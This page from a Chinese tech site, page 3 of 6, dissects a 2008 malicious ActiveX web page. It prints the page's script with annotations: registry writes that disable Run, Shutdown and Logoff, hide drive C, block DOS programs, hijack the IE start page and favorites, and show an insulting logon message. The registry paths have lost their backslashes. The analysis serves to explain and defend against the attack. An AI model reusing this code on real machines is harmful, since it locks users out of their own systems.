登录论坛 | 注册会员 设为首页 | 收藏本站
当前位置 : 首页>软件学院>操作系统>注册表>正文
 
浏览网页注册表被修改之迷及解决办法

http://www.dbit.cn 2008/4/26 22:57:16  来源:不详  编辑:叶子
 

进入该网页会被:

  1.修改开始菜单

  1)禁止“关闭系统”

  2)禁止“运行”

  3)禁止“注销”

  2.隐藏C盘——你的C盘找不到了

  3.禁止使用注册表编辑器regedit

  4.禁止使用DOS程序

  5.使系统无法进入“实模式”

  6.禁止运行任何程序

  7.将IE浏览器的首页改为http://www.findfeel.com/,收藏夹中也被加入该网址。

  那么这些功能恐怖的功能是如何实现的呢?原来,该网页是有人利用Java技术制作的含有有害代码的ActiveX网页文件。为让更多的人了解其危害,我查看了其源代码,将其主要部分列了出来,并加了详细的注释(文中有“注”字的部分是我加的注释)。

  注:下面代码是将你的IE默认连接首页改为http://www.findfeel.com/

  Shl.RegWrite ("HKCUSoftwareMicrosoftInternet ExplorerMainStart Page", "http://www.findfeel.com/");

  注:以下是该网页修改受害者的注册表项所用的招数

  Shl.RegWrite ("HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun", 01, "REG_BINARY");

  注:使受害者系统没有“运行”项,这样用户就不能通过注册表编辑器来修改该有害网页对系统注册表的修改。

  Shl.RegWrite ("HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose", 01, "REG_BINARY");

  注:使受害者系统没有“关闭系统”项

  Shl.RegWrite ("HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoLogOff", 01, "REG_BINARY");

  注:使受害者系统没有“注销”项

  Shl.RegWrite ("HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives", "00000004", "REG_DWORD");

  注:使受害者系统没有逻辑驱动器C

  Shl.RegWrite ("HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp Disabled","REG_BINARY");

  注:禁止运行所有的DOS应用程序;

  Shl.RegWrite ("HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies WinOldAppNoRealMode","REG_BINARY");

  注:使系统不能启动到“实模式”(传统的DOS模式)下;

  又注:进入该网页,它还会修改以下的注册表项,使WINDOWS系统登录时显示一个登录窗口(在MicroSoft网络用户登录之前)

  Shl.RegWrite ("HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeCaption", "呜啦啦...");

  注:这些代码会使窗口的标题是“呜啦啦…”

  Shl.RegWrite ("HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeText", "欢迎你!你这个超级无敌大白痴!《呜啦啦...》故事开始了,按确定进入悲惨世界");

  注:上面一行是会在窗口中显示出来的文字

  注:下面两行代码修改注册表,使受害者所有的IE窗口都加上以下的标题:“呜啦啦…”

  Shl.RegWrite ("HKLMSoftwareMicrosoftInternet ExplorerMainWindow Title", "呜啦啦..."); Shl.RegWrite ("HKCUSoftwareMicrosoftInternet ExplorerMainWindow Title", "呜啦啦...");

  注:到上面一行为止,完成了对受害者的注册表的所有修改!

  注:下面代码用来将其网页增加到受害者的收藏夹中

  var WF, Shor, loc; WF = FSO.GetSpecialFolder(0); loc = WF + "Favorites"; if(!FSO.FolderExists(loc)) { loc = FSO.GetDriveName(WF) + "Documents and Settings" + Net.UserName + "Favorites"; if(!FSO.FolderExists(loc)) { return; } }

注:下面就是使其网页加入到你的收藏夹的具体代码

  AddFavLnk(loc, "找到感觉www.findfeel.com", http://www.findfeel.com);

本新闻共6页,当前在第3页  1  2  3  4  5  6  

收藏】【打印】【进入论坛
  相关文章:

·win 注册表全解开始菜单及相关设置
·运用注册表给系统应用程序加口令
·由注册表怎么防御黑客如入侵
·修改注册表实现Win 7系统自动拨号
·修改注册表让你在局域网中隐身
·用注册表恢复“碎片整理”按钮功能
·从注册表切断一切黑客入侵的路径
·非windows环境下编辑注册表的方法
·修改注册表权限加强对木马病毒防范
·让登录注册表时 保持在根目录状态
·注册表或组策略解决任务管理器问题 

 
 
 
最新文章

抢先苹果,消息称英特尔芯片采用台积电
三星揭晓业内首款单条 512GB DDR5 内存
vivo 高端新机爆料:120Hz 曲面屏 + 天
vivo Y21 在印度正式上市:Helio P35 芯
微星推出 GeForce RTX 3080 Sea Hawk X
消息称三星 Galaxy Tab S8 系列平板将放
机械革命推出 F6 轻薄本:16 英寸全面屏
英特尔 12 代 Alder Lake CPU 600 系列
雷军:向小米手机 1 首批用户每人赠送价
小米李明谈用户被踢出 MIUI 测试版:大

推荐文章
1
2
3
4
5
6
7
8
9
10
叛逆嫩模性感写真
宫如敏不雅照疯传 看张馨予韩一菲兽兽谁
不惧孔子抢位 阿凡达游戏影音配置推荐
2015第十七届“东北安博会”火爆招商
第十六届东北国际公共安全防范产品博览
2016年第五届中国国际商业信息化博览会
2016年第五届中国国际POS机及相关设备展
互联网电视熟了吗 2013最火电视深解析
桑达获邀出席2015中国(广州)国际POS机
宝获利报名参加“2015年度中国POS机行业
八卦图解 More>>
叛逆嫩模性感写真 宫如敏不雅照疯传 看张馨予韩一菲
周伟童魔鬼身材日本性感写真图  联想V360笔记本模特写真